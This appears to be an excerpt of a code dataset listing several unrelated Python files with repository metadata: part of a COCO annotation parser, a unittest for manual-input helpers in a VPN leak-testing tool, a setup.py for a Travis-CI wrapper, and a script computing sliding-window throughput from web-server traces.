print(f"Failed to read precomputed stats: {e}")
if stats is None:
stats = CocoDatasetStats(f_ann, img_dir)
pickle.dump(stats, open(stats_fpath, "wb"))
return stats
def box_within_bounds(
x, y, w, h, width, height, min_margin_ratio, min_width_height_ratio
):
"""
function for checking whether bbox width-height falls within set margin
"""
min_width = min_width_height_ratio * width
min_height = min_width_height_ratio * height
if w < min_width or h < min_height:
return False
top_margin = min_margin_ratio * height
bottom_margin = height - top_margin
left_margin = min_margin_ratio * width
right_margin = width - left_margin
if x < left_margin or x > right_margin:
return False
if y < top_margin or y > bottom_margin:
return False
return True
class SubCocoParser(Parser, LabelsMixin, BBoxesMixin, FilepathMixin, SizeMixin):
"""
Albumentations data augmentation requires a certain bbox width-height
w.r.t the primary image
This Parser ensures that we filter for that
See Issue : https://github.com/airctic/icevision/issues/467
"""
def __init__(
self,
stats: CocoDatasetStats,
min_margin_ratio=0.15,
min_width_height_ratio=0.1,
quiet=True,
):
self.stats = stats
self.data = (
[]
) # list of tuple of form (img_id, width, height, bbox, label_id, img_path)
skipped = 0
for img_id, imgfname in stats.img2fname.items():
imgf = f"{stats.img_dir}/{imgfname}"
width, height = stats.img2sz[imgf] # updated
bboxs = []
lids = []
for lid, x, y, w, h in stats.img2lbs[img_id]:
if lid is not None and box_within_bounds(
x, y, w, h, width, height, min_margin_ratio, min_width_height_ratio
):
b = [int(x), int(y), int(w), int(h)]
_ = int(lid)
bboxs.append(b)
lids.append(_)
else:
if not quiet:
print(f"warning: skipping lxywh of {lid, x, y, w, h}")
if len(bboxs) > 0:
self.data.append(
(
img_id,
width,
height,
bboxs,
lids,
imgf,
)
)
else:
skipped += 1
print(f"Skipped {skipped} out of {stats.num_imgs} images")
def __iter__(self):
yield from iter(self.data)
def __len__(self):
return len(self.data)
def imageid(self, o) -> Hashable:
return o[0]
def filepath(self, o) -> Union[str, Path]:
return o[5]
def height(self, o) -> int:
return o[2]
def width(self, o) -> int:
return o[1]
def image_width_height(self, o) -> Tuple[int, int]:
return (o[1], o[2])
def labels(self, o) -> List[int]:
return o[4]
def bboxes(self, o) -> List[BBox]:
return [BBox.from_xywh(x, y, w, h) for x, y, w, h in o[3]]
| 31.068182 | 88 | 0.547427 | 1,071 | 8,202 | 4.011204 | 0.222222 | 0.019786 | 0.005587 | 0.007449 | 0.092877 | 0.059125 | 0.05121 | 0.05121 | 0.05121 | 0.02933 | 0 | 0.018536 | 0.348817 | 8,202 | 263 | 89 | 31.186312 | 0.785808 | 0.125213 | 0 | 0.075676 | 0 | 0 | 0.045692 | 0.007615 | 0 | 0 | 0 | 0 | 0 | 1 | 0.075676 | false | 0 | 0.07027 | 0.048649 | 0.232432 | 0.016216 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5ed3804f209192e36d60aa99aa13e5c562c0312b | 3,386 | py | Python | test/test_manual_input.py | UAEKondaya1/expressvpn_leak_testing | 9e4cee899ac04f7820ac351fa55efdc0c01370ba | [
"MIT"
] | 219 | 2017-12-12T09:42:46.000Z | 2022-03-13T08:25:13.000Z | test/test_manual_input.py | UAEKondaya1/expressvpn_leak_testing | 9e4cee899ac04f7820ac351fa55efdc0c01370ba | [
"MIT"
] | 11 | 2017-12-14T08:14:51.000Z | 2021-08-09T18:37:45.000Z | test/test_manual_input.py | UAEKondaya1/expressvpn_leak_testing | 9e4cee899ac04f7820ac351fa55efdc0c01370ba | [
"MIT"
] | 45 | 2017-12-14T07:26:36.000Z | 2022-03-11T09:36:56.000Z | import os
import sys
import unittest
from multiprocessing import Process, Queue
import mock
from xv_leak_tools.log import L
from xv_leak_tools.manual_input import allow_manual_input, disallow_manual_input
from xv_leak_tools.manual_input import message_and_await_string
from xv_leak_tools.manual_input import message_and_await_enter
# from xv_leak_tools.manual_input import message_and_await_yes_no
class AnyStringWithSubstring(str):
def __eq__(self, other):
return self in other
def __repr__(self):
return ".*{}.*".format(super().__str__())
class AnyStringWithSubstrings(list):
def __eq__(self, other):
for substr in self:
if substr not in other:
return False
return True
def __repr__(self):
return ', '.join([".*{}.*".format(substr) for substr in self])
class TestManualInput(unittest.TestCase):
def setUp(self):
allow_manual_input()
def tearDown(self):
disallow_manual_input()
@staticmethod
def _call_method_in_subprocess(method, input_):
queue = Queue()
rpipe, wpipe = os.pipe()
proc = Process(target=method, args=(queue, rpipe,))
os.write(wpipe, input_.encode())
proc.start()
proc.join()
os.close(wpipe)
os.close(rpipe)
return queue.get()
def test_message_and_await_enter(self): # pylint: disable=no-self-use
def call_message_and_await_enter(queue, fake_stdin):
sys.stdin = os.fdopen(fake_stdin)
with mock.patch('sys.stdout') as fake_stdout:
L.configure()
message_and_await_enter('Hello')
fake_stdout.assert_has_calls([
mock.call.write(AnyStringWithSubstrings(['Hello', 'Press ENTER to continue'])),
])
queue.put(None)
TestManualInput._call_method_in_subprocess(call_message_and_await_enter, "\n")
def test_message_and_await_string(self):
def call_message_and_await_string(queue, fake_stdin):
sys.stdin = os.fdopen(fake_stdin)
with mock.patch('sys.stdout') as fake_stdout:
L.configure()
ret = message_and_await_string('Please give me some string data')
fake_stdout.assert_has_calls([
mock.call.write(AnyStringWithSubstrings(['Please give me some string data'])),
])
queue.put(ret)
ret = TestManualInput._call_method_in_subprocess(call_message_and_await_string, "Bonza\n")
self.assertEqual(ret, 'Bonza')
# def test_message_and_await_yes_no(self):
# def call_message_and_await_yes_no(queue, fake_stdin):
# sys.stdin = os.fdopen(fake_stdin)
# with mock.patch('sys.stdout') as fake_stdout:
# L.configure()
# ret = message_and_await_yes_no('This is a yes or no question')
# fake_stdout.assert_has_calls([
# mock.call.write(AnyStringWithSubstrings(['This is a yes or no question'])),
# ])
# queue.put(ret)
# for expected_in_out in [('y', True), ('n', False)]:
# ret = TestManualInput._call_method_in_subprocess(
# call_message_and_await_yes_no, expected_in_out[0])
# self.assertEqual(ret, expected_in_out[1])
| 33.86 | 99 | 0.633786 | 417 | 3,386 | 4.803357 | 0.251799 | 0.074888 | 0.112332 | 0.056915 | 0.54668 | 0.484274 | 0.427359 | 0.389416 | 0.389416 | 0.271593 | 0 | 0.000807 | 0.268458 | 3,386 | 99 | 100 | 34.20202 | 0.807832 | 0.232428 | 0 | 0.229508 | 0 | 0 | 0.055383 | 0 | 0 | 0 | 0 | 0 | 0.04918 | 1 | 0.180328 | false | 0 | 0.147541 | 0.04918 | 0.47541 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5ed4015a6c4a19ef552f600253d6f3d0dfc05c83 | 904 | py | Python | setup.py | guillermo-carrasco/pytravis | da09d9f64d81b0db3ab8fa070d473f54cda1303a | [
"MIT"
] | 3 | 2015-01-27T09:07:48.000Z | 2021-01-09T17:45:44.000Z | setup.py | guillermo-carrasco/pytravis | da09d9f64d81b0db3ab8fa070d473f54cda1303a | [
"MIT"
] | null | null | null | setup.py | guillermo-carrasco/pytravis | da09d9f64d81b0db3ab8fa070d473f54cda1303a | [
"MIT"
] | null | null | null | from setuptools import setup, find_packages
import sys, os
version = '0.3'
setup(name='pytravis',
version=version,
description="Python wrapper for Travis-CI API",
long_description="""\
Python wrapper for Travis-CI API. Set of scripts to get information from travis.""",
classifiers=[], # Get strings from http://pypi.python.org/pypi?%3Aaction=list_classifiers
keywords='travis ci countinuous-integration api',
author='Guillermo Carrasco Hernandez',
author_email='guillermo.carrasco@scilifelab.se',
url='http://guillermo-carrasco.github.com/pytravis/',
license='GPLv3',
packages=find_packages(exclude=['ez_setup', 'examples', 'tests']),
include_package_data=True,
zip_safe=True,
install_requires=[
'requests',
'prettytable'
],
data_files=[(os.environ['HOME'], ['config/.pytravisrc'])]
)
| 34.769231 | 95 | 0.668142 | 103 | 904 | 5.757282 | 0.660194 | 0.040472 | 0.080944 | 0.091062 | 0.128162 | 0.128162 | 0.128162 | 0 | 0 | 0 | 0 | 0.00551 | 0.196903 | 904 | 25 | 96 | 36.16 | 0.811295 | 0.07854 | 0 | 0 | 0 | 0 | 0.403129 | 0.066185 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.086957 | 0 | 0.086957 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5ed71fb1c4d7c7ac8578c5f7266cc08abffb712a | 2,524 | py | Python | exp/motivation/variable_throughput/nginx/analysis.py | sarsanaee/Backdraft | 5c60bdb17901d402ebc6feea2d43f26e56d66668 | [
"MIT"
] | null | null | null | exp/motivation/variable_throughput/nginx/analysis.py | sarsanaee/Backdraft | 5c60bdb17901d402ebc6feea2d43f26e56d66668 | [
"MIT"
] | null | null | null | exp/motivation/variable_throughput/nginx/analysis.py | sarsanaee/Backdraft | 5c60bdb17901d402ebc6feea2d43f26e56d66668 | [
"MIT"
] | null | null | null | #!/usr/bin/python3
import numpy as np
import sys
if len(sys.argv) < 3:
print("Error: Invalid parameters: Path to trace not existed")
print("usage: ./program window [<path_to_trace>]")
exit(0)
# data = np.loadtxt("1M_Req_1_Concurrency.txt")
# data = np.loadtxt("/tmp/ab_stats_7.txt")
ts_data = []
try:
for j in range(2, len(sys.argv)):
path_to_trace = sys.argv[j]
data = np.loadtxt(path_to_trace)
size = 79
if j == 3:
size = 237
print(size)
for i in data:
ts_data.append((i[0] + i[1], size))
except Exception as e:
print("Error: ", e)
exit(0)
# data = np.loadtxt("/tmp/ab_stats_2_core.txt")
ts_data = np.array(ts_data)
# ts_data.sort()
ts_data = ts_data[ts_data[:, 0].argsort()]
t_data = []
sliding_wnd = 50
if sys.argv[1]:
sliding_wnd = int(sys.argv[1])
# bytes_per_request = 79
counter = 0
tput = 0
window = []
total_bytes = ts_data[0][1]
cnt = 0
size = len(ts_data)
s_wnd_idx = 0
e_wnd_idx = 0
while(e_wnd_idx < size - 1 or e_wnd_idx != s_wnd_idx):
if e_wnd_idx < size - 1 and ts_data[e_wnd_idx][0] - ts_data[s_wnd_idx][0] <= sliding_wnd:
e_wnd_idx += 1
total_bytes += ts_data[e_wnd_idx][1]
continue
tput = (total_bytes - ts_data[e_wnd_idx][1]) / sliding_wnd
t_data.append(tput)
total_bytes -= ts_data[s_wnd_idx][1]
s_wnd_idx += 1
tput = (total_bytes/sliding_wnd)
t_data.append(tput)
print(s_wnd_idx)
print(e_wnd_idx)
# if e_wnd_idx % 1000000 == 0:
# print("total size: ", size, " cur index:", e_wnd_idx)
# if e_wnd_idx - s_wnd_idx + 1 > 1 and ts_data[e_wnd_idx][0] - ts_data[s_wnd_idx][0] >= sliding_wnd:
# # print("len window", wind_size)
# #calculate the throughput
# # tput = bytes_per_request * (len(window) - 1) / sliding_wnd
# # tput = total_bytes * (e_wnd_idx - s_wnd_idx) / sliding_wnd
# tput = (total_bytes - ts_data[e_wnd_idx][1]) / sliding_wnd
# t_data.append(tput)
# total_bytes -= ts_data[s_wnd_idx][1]
# s_wnd_idx += 1
# continue
# total_bytes += ts_data[e_wnd_idx][1]
# e_wnd_idx += 1
#
# if e_wnd_idx - s_wnd_idx > 0:
# tput = total_bytes / sliding_wnd
# t_data.append(tput)
#
# This part is just verification
print(len(t_data), len(ts_data))
# f = ts_data[0]
# for i in range(1, len(ts_data)):
# ts_data[i][0] = ts_data[i][0] - f[0]
# f[0] = 0
np.savetxt("x_data.txt", ts_data[:,0])
np.savetxt("y_data_200.txt", t_data)
| 23.155963 | 104 | 0.614501 | 439 | 2,524 | 3.225513 | 0.207289 | 0.127119 | 0.088983 | 0.079096 | 0.42726 | 0.375706 | 0.307203 | 0.268362 | 0.234463 | 0.179379 | 0 | 0.036326 | 0.236529 | 2,524 | 108 | 105 | 23.37037 | 0.698495 | 0.41878 | 0 | 0.08 | 0 | 0 | 0.086653 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.04 | 0 | 0.04 | 0.14 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |